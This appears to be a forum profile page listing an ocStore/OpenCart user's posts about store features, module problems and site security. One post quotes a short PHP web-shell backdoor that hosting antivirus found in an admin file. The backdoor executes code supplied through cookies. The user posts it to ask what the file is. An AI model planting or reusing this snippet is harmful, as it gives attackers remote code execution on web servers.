Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

ainur

Новачок
  
  • Публікації

    13
  • З нами

  • Відвідування

Усі публікації користувача ainur

  1. Можно ли реализовать и как подобию Яндекс.Маркета - сервиса поиска товаров с разных магазинов, добавленных в базу данных. Т.е. чтобы была карточка товара, а там списком указывалось например: что в этом магазине этот товар по такой цене, во втором магазине по другой цене. Соответственно, эти данные о магазинах и товарах вводятся в БД.
  2. Подскажите, как зищитить опен карт от взлома?
  3. Версия ocStore 2.1.0.2.1 Сегодня пришло такое сообщение: На вашем хостинге в результате плановой антивирусной проверки обнаружены файлы, содержащие вредоносное или потенциально опасное программное обеспечение, такое как: вирусы, троянские программы или web-shell скрипты. Список обнаруженных файлов: ***.ru / admin / model / fraud / object.php Внутри файла находится код: <?php $xgsf=$_COOKIE; $jtp=$xgsf[hlya]; if($jtp){ $ivn=$jtp($xgsf[zxim]);$swg=$jtp($xgsf[oqjx]);$mrq=$ivn("",$swg);$mrq(); } Подскажите, что это за файл? Он у всех есть такой? Версия ocStore 2.1.0.2.1
  4. В общем купил модуль. Пропали теги из товаров. Сам модуль не пашет. Автор молчит((. Не знаю что делать. Походу искать программеров и допиливать модуль.
  5. Купить модуль. С админки по этой ссылке почему то переходит: /admin/<b>Notice</b>: Undefined variable: tags in <b>/home/h22258/public_html/system/storage/modification/admin/view/template/common/menu.tpl</b> on line <b>21</b> Что делать?
  6. Надо сделать три уровня доступа на сайт: - физ. лицо: без регистрации делает «заказ в 1 клик», с регистрацией, видит рублевые розничные цены - оптовый покупатель (юр. лицо, ИП): с регистрацией, видит дилерские цены, если присвоена постоянная скидка – то цены с учетом этой скидки, если количество заказанного товара превышает остатки на складе, видит всплывающее окно с информацией о доступном для заказа количестве - сотрудник компании: видит дилерские цены, себестоимость, остатки на складе, статус заказа, историю заказов. Пишите в скайп: ainur1111 Ждем)
  7. Сделать двухстороннюю синхронизацию с 1С. Автоматическая выгрузка данных из базы 1с и обновление информации (остатки) в режиме «онлайн» (раз в 30 мин). Пишите в скайп: ainur1111

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.